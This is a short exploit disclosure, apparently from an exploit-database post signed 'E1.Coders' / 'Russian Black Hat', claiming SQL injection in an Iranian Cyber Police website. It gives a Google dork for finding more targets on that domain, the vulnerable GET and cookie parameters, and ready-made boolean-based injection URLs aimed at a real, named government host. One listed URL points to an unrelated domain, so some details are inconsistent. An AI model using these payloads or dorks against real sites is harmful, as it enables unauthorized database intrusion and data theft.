This site belongs to the Iranian Cyber Police
(پلیس فضای تولید و تبادل اطلاعات فراجا) (fata), which has a security problem with the SQL INJECTION Vulnerability "CWE-89".
We have repeatedly reported to this site that it has a security problem and has ignored our report.
We want to record this security issue
#########################################################################################################################
# #
# Exploit Title : "Iranian Cyber Police has an SQL Injection vulnerability." #
# "Vulners AI Score: 7.8. Confidence level: High." #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : https://csirc.fata.gov.ir/ #
# #
# Security Risk : Medium #
# #
# Description : All target's IRanian Military websites #
# #
# DorK : ""inurl:/page/news-details?id=" "site:fata.gov.ir/page/news-details?id=" #
# #
#########################################################################################################################
# #
# Expl0iTs: #
#
#
# address (refer url): https://csirc.fata.gov.ir/page/news
#
# vulnerabillity : GET SQL INJECT BOOLEAN Based string
#
# action url: https://csirc.fata.gov.ir/page/news-details?id=100014%22
# action url: https://csirc.fata.gov.ir/page/news-details?id=%22100014
# action url: https://csirc.fata.gov.ir/page/news-details?id=100014%27
--------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address :https://csirc.fata.gov.ir/page/news-details?id=100014
#
# request type : COOKIE
#
# action url : https://csirc.fata.gov.ir/page/news-details?id=100014
# parameter : service_id
#
# description : COOKIE SQL INJECTION BooleanBased String
#
# POC : https://csirc.fata.gov.ir/page/news-details?id=100014&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199
---------------------------------------
# vuln type : SQLInjection
#
# refer address : https://csirc.fata.gov.ir/page/news-details?id=100014
#
# request type : GET
#
# action url : https://gerdab.ir/fa/archive?sec_id=63&service_id=9
#
# parameter : service_id
#
# description : GET SQL INJECTION BooleanBased Integer
#
# POC : https://csirc.fata.gov.ir/page/news-details?id=.&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end)
#
# #
# #
#########################################################################################################################
# #
# | Security Is JOCK | #
# #
# | Russian Black Hat | #
# #
#########################################################################################################################